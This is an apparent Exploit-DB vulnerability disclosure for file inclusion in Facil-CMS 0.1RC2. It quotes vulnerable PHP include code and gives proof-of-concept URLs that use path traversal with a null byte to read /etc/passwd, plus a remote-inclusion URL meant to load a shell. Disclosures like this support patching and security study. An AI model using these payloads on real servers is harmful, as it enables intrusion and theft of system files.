Facil-CMS 0.1RC2 - Local/Remote File Inclusion

EDB-ID:

12061




Platform:

PHP

Date:

2010-04-04


########################################################
	Facil-CMS (LFI/RFI) Vulnerability
########################################################
[+]Title	:	Facil-CMS Multiple Vulnerability
[+]Version:	0.1RC2 
[+]Download:	http://sourceforge.net/projects/facil-cms/files/
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com		

	[!]Thank`s To: all friends

########################################################

	-=[ Vuln C0de ]=-
***********************
[-]facil-cms/index.php

 require_once('config.inc.php');
 require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
 
 $config = new facilConfig();
 $utils = new facilUtils();
 
 if($utils->is_module($config->getSiteIndex()))

require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/config.php');
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/class/index.php');

***********************
[-]facil-cms/modules.php

require_once('config.inc.php');
 require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');

 if($_POST['modload'] && !eregi("/", $_POST['modload']))
 {
 	$_MODLOAD = trim($_POST['modload']);
 	if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
 	{
 		$FILELOAD = trim($_POST['fileload']);

 	$_MODLOAD = false;
 	$FILELOAD = false;

 if($_POST['admload'] &&  !eregi("/", $_POST['admload']))
 {
 	$_ADMLOAD = trim($_POST['admload']);
 	if($_POST['fileload'] && !eregi("/", $_POST['fileload']))


 	$_ADMLOAD = false;
 	$FILELOAD = false;

	require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/config.php');
	require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/class/index.php');

*******************

[-]facil-cms/includes/facil-settings.php

if(!isset($_SESSION['FACIL_LANGUAGE']))
 {
 	$_SESSION['FACIL_LANGUAGE'] = $config->getLanguage();
 }
 
 require_once(_FACIL_I18N_PATH_ . '/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
 require_once(_FACIL_THEMES_PATH_ . '/' . $_SESSION['FACIL_THEME'] . '/themeFacil.class.php');

*******************

	-=[ Proof Of Concept ]=-

	http://127.0.0.1/facil-cms/modules.php?modload=../../../../../../../../etc/passwd%00
	Similar reference:
	http://www.exploit-db.com/exploits/5792

	http://127.0.0.1/facil-cms/index.php?getSiteIndex=../../../../../../../../etc/passwd%00

	http://127.0.0.1/facil-cms//includes/facil-settings.php?FACIL_THEME= [rfi shell]

########################################################